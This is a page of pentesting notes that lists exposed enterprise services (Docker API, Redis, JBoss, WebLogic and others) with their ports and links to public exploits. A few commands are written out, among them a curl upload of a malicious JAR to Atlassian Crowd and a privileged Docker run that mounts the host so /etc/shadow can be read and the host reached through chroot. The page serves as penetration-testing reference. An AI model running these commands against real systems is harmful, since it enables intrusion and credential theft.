Tactics, Techniques, and Procedures
Personal BlogTwitterGitHubContact
  • Tactics, Techniques, and Procedures
  • ☠️Pentesting
    • Fortress
      • Automation
      • Cisco
        • Cisco Adaptive Security Appliance
        • Cisco Smart Install
      • CMS
        • Drupal
        • Wordpress
      • Exchange
      • Office365
      • Okta
      • Outlook Web Access (OWA)
      • SSH
      • Subdomain Takeover
    • Infrastructure
      • Active Directory
        • AD CS
        • Coercing Authentication
        • Credential Dumping
          • Cached Domain Credentials
          • Data Protection API (DPAPI)
          • Group Policy Preferences
          • LSA Secrets
          • LSASS Memory
          • NTDS
          • Security Account Manager (SAM)
          • Kerberos Tickets
          • Unsecured Credentials
          • WDigest
          • WiFi Profiles
        • Delegation Abuse
          • Constrained Delegation
          • Unconstrained Delegation
        • Domain Enumeration
        • Domain Dominance
          • Forge Golden Ticket
          • Forge Silver Ticket
          • Forge Trust Ticket
          • Skeleton Key
        • Group Policy Preferences
        • Kerberos
          • AS-REP Roasting
          • Kerberoasting
          • Kerberos Relaying
        • Lateral Movement
          • PowerShell
          • Windows Remote Management (WinRM)
        • Local Administrator Password Solution (LAPS)
        • NoPac
        • NTLMv1
        • Password Cracking
        • Password Policy
        • Password Spraying
        • Reconnaissance
        • Relaying
          • LDAP Relaying
          • SMB Relaying
        • Shadow Credentials
        • Zerologon
      • Database Management System (DBMS)
        • Microsoft SQL Server
      • Defense Evasion
        • Disable or Modify Tools
        • Disable Windows Event Logging
        • Impair Command History Logging
        • Timestomping
      • Low-Hanging Fruit
      • Networks
        • IPv6
        • LLMNR/NBT-NS Poisoning
        • Network Scanning
        • Network Sniffing
        • Segmentation Testing
        • Simple Network Management Protocol (SNMP)
        • Subnet Enumeration
        • Identifying Domain Information
      • Persistence
        • Create Account
        • Remote Desktop
        • Services
          • Service Privilege Escalation / Persistence
          • Systemd Service Persistence
        • Web Shell
        • DLL Hijacking
      • Pivoting
      • Privilege Escalation
        • Linux
          • Setuid and Setgid
        • Windows
          • Privilege Abuse
            • SeImpersonatePrivilege
            • SeLoadDriverPrivilege
          • Service Exploitation
    • Initial Access
      • Phishing
        • Creating Templates
          • Leveraging AI During Template Creation
        • Payloads
          • Non-malicious Callback
          • Macros
    • OSINT
      • Identifying Users
      • Network Information
      • Search Engines
    • Web Applications
      • Access Control
      • APIs
        • Swagger API
      • Authentication
        • Account Takeover
      • Clickjacking
      • Cross Origin Resource Sharing (CORS)
      • Cross Site Request Forgery (CSRF)
      • Document Object Model (DOM)
      • File Upload
      • Google Dorking
      • GraphQL
      • HTTP Request Smuggling
      • Information Disclosure
      • Insecure Direct Object Reference (IDOR)
      • Injection Vulnerabilities
        • Cross-Site Scripting (XSS)
          • Blind Cross-Site Scripting
          • Finding Cross-Site Scripting
          • Stealing Cookies
          • XSS Payloads
        • CSV Injection
        • XML External Entity Injection (XXE)
        • LDAP Injection
        • NoSQL Injection
        • Server-Side Template Injection
        • SQL Injection
      • JSON Web Tokens (JWT)
      • Local File Inclusion (LFI)
      • OAuth
      • Open Redirection
      • Password Reset Poisoning
      • Prototype Pollution
      • Race Condition
      • Rate Limit Bypass
      • Remote Code Execution (RCE)
      • Remote File Inclusion (RFI)
      • Suspicious Parameters
      • Tooling
        • Burp Suite
          • Authentication / Proxy Issues
          • Intruder Attack Types
          • Match and Replace
          • Quality of Life
        • Misc Tooling
      • WAF Bypasses
      • WebSockets
      • Web Cache Deception
      • Web Cache Poisoning
    • Wireless
      • WPA / WPA2
        • Alfa Troubleshooting
        • Enterprise
        • Personal
    • Cloud
      • Amazon Web Services (AWS)
      • Microsoft Azure
  • 🧨Red Teaming
    • C2
      • Cobalt Strike
      • Empire
      • Metasploit
        • Metasploit Datatabase
      • Mythic
      • Sliver
    • Malware Dev
    • Offensive Infrastructure
      • Cloud Fronting
      • Redirectors
      • OpSec
      • Phishing Infrastructure
      • Creating a Dropbox
    • Offensive Tactics
    • Philosophy
  • 🦋Bug Bounty
    • Bug Bounty Tips & Tricks
  • 📖Resources
    • Blog Posts and Goodies
    • Checklists
    • Offensive Security Notes
    • Tooling Repository
    • Active Directory Toolkit
Powered by GitBook
On this page
  • Services
  • Adobe ColdFusion BlazeDS
  • Apache Flink
  • Apache Hadoop
  • Apache Solr
  • Apache Spark
  • Atlassian Crowd
  • Cisco Smart Install
  • Cisco Unified Communications Manager
  • Dameware
  • Dell iDrac
  • Docker API
  • GlassFish
  • Hashicorp Consul
  • HP Data Protector
  • HP iLO
  • IBM Websphere
  • IPMI
  • Java RMI
  • JBoss
  • JDWP
  • JMX
  • MS17-010: Eternal Blue
  • Portainer
  • PrintNightmare
  • Redis
  • SAP
  • WebLogic
  • Zoho Manageengine Desktop
  • References
  1. Pentesting
  2. Infrastructure

Low-Hanging Fruit

Easy ways to get a shell

PreviousTimestompingNextNetworks

Last updated 2 years ago

Services

Adobe ColdFusion BlazeDS

Ports: 8080 Exploit:

Apache Flink

Ports: 5000 Exploit:

Apache Hadoop

Ports: 8088 Exploit:

Apache Solr

Ports: 8983 Exploit:

Apache Spark

Ports: 6066 Exploit:

Atlassian Crowd

Ports: 4990 Exploit:

curl -k -H "Content-Type: multipart/mixed" \ --form "file_cdl=@rce.jar" http://[HOST]:4990/crowd/admin/uploadplugin.action

Cisco Smart Install

Ports: 4786 Exploit:

Cisco Unified Communications Manager

Ports: 6970 Exploit:

curl http://[CUCM IP Address]:6970/ConfigFileCacheList.txt

Dameware

Ports: 6129 Exploit:

Dell iDrac

Ports: 443

Exploit:

Docker API

Ports: 2375 Exploit:

docker -H [host]:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
  • File Access: cat /mnt/etc/shadow

  • Remote Code Execution: chroot /mnt

GlassFish

Ports: 4848 Exploit:

Hashicorp Consul

Ports: 8500 Exploit:

HP Data Protector

Ports: 5555, 5556 Exploit:

HP iLO

Ports: 80, 443

Exploit:

IBM Websphere

Ports: 8880 Exploit:

IPMI

Ports: 623 Exploit:

Java RMI

Ports: 1090, 1098, 1099, 4444, 11099, 47001, 47002, 10999 Exploit:

JBoss

Ports: 4444, 4445, 11111 Exploit:

JDWP

Ports: 5005 - 5009, 45000, 45001 Exploit:

JMX

Ports: 8686, 9012, 50500 Exploit:

MS17-010: Eternal Blue

Ports 139, 445

Exploit:

nmap -Pn -sV --script smb-vuln-ms17-010 -p139,445 $ip 

Portainer

Ports: 9000 Exploit:

PrintNightmare

crackmapexec smb $host_file -u $username -p $password -M spooler

Redis

Ports: 6379 Exploit:

SAP

Ports: 3300 Exploit:

WebLogic

Ports: 7000-7004, 7070, 7071, 8000-8003, 9000-9003, 9503 Exploit:

Zoho Manageengine Desktop

Ports: 8383 Exploit:

References

☠️
LogoAdobe ColdFusion BlazeDS Java Object Deserialization RCE
LogoAdobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code ExecutionExploit Database
LogoApache Flink JAR Upload Java Code ExecutionRapid7
LogoApache Flink JobManager TraversalRapid7
LogoApache Flink 1.9.x - File Upload RCE (Unauthenticated)Exploit Database
LogoHadoop YARN ResourceManager Unauthenticated Command ExecutionRapid7
Logovulhub/exploit.py at master · vulhub/vulhubGitHub
LogoGitHub - jas502n/solr_rce: Apache Solr RCE via Velocity templateGitHub
LogoGitHub - Imanfeng/Apache-Solr-RCE: Apache Solr Exploits 🌟GitHub
LogoGitHub - ivanitlearning/CVE-2018-11770: Python RCE exploit for Apache Spark rewritten from Metasploit moduleGitHub
LogoApache Spark Unauthenticated Command ExecutionRapid7
LogoAtlassian Crowd pdkinstall Remote Code Execution ≈ Packet Storm
LogoIdentify Cisco Smart Install endpointsRapid7
LogoGitHub - frostbits-security/SIET: Smart Install Exploitation ToolGitHub
LogoGitHub - trustedsec/SeeYouCM-ThiefGitHub
LogoSolarWinds Dameware Mini Remote Control Unauthenticated RCETenable®
Logopoc/dwrcs_dwDrvInst_rce.py at master · tenable/pocGitHub
LogoDell iDRAC Default LoginRapid7
LogoPath Traversal in Oracle GlassFish Server Open Source EditionRapid7
LogoHashicorp Consul Remote Command Execution via Services APIRapid7
LogoHP Data Protector EXEC_INTEGUTIL Remote Code ExecutionRapid7
LogoHP Data Protector 8.10 Remote Command ExecutionRapid7
LogoCVE-2017-12542/exploit_1.py at master · skelsec/CVE-2017-12542GitHub
LogoIBM WebSphere RCE Java Deserialization VulnerabilityRapid7
LogoIPMI Information DiscoveryRapid7
LogoIPMI 2.0 RAKP Remote SHA1 Password Hash RetrievalRapid7
LogoIPMI 2.0 Cipher Zero Authentication Bypass ScannerRapid7
LogoJava RMI Server Insecure Default Configuration Java Code ExecutionRapid7
LogoJava RMI for pentesters: structure, recon and communication (non-JMX Registries).Medium
LogoJava RMI for pentesters part two — reconnaissance & attack against non-JMX registriesMedium
LogoJBoss Vulnerability ScannerRapid7
LogoGitHub - joaomatosf/jexboss: JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation ToolGitHub
LogoJava Debug Wire Protocol Remote Code ExecutionRapid7
LogoGitHub - IOActive/jdwp-shellifierGitHub
LogoJava JMX Server Insecure Configuration Java Code ExecutionRapid7
LogoMS17-010 EternalBlue SMB Remote Windows Kernel Pool CorruptionRapid7
LogoGitHub - MauroEldritch/PAZUZU: PAZUZU (Portainer Authentication Zap Using Zero Utilities) is a ruby exploit for vulnerable Portainer instances (--no-auth). Featured @ DevFest Siberia 2018.GitHub
LogoGitHub - MauroEldritch/lempo: LEMPO (Ldap Exposure on POrtainer) is an exploit for CVE-2018-19466 (LDAP Credentials Disclosure on Portainer). Featured @ DevFest Siberia 2018GitHub
LogoGitHub - cube0x0/CVE-2021-1675: C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527GitHub
LogoRedis Replication Code ExecutionRapid7
LogoRedis Unauthenticated Code ExecutionRapid7
LogoGitHub - chipik/SAP_GW_RCE_exploit: SAP Gateway RCE exploitsGitHub
LogoOffensive Security’s Exploit Database Archive
https://srcincite.io/pocs/src-2020-0011.py.txt
LogoGitHub - trustedsec/spoonmapGitHub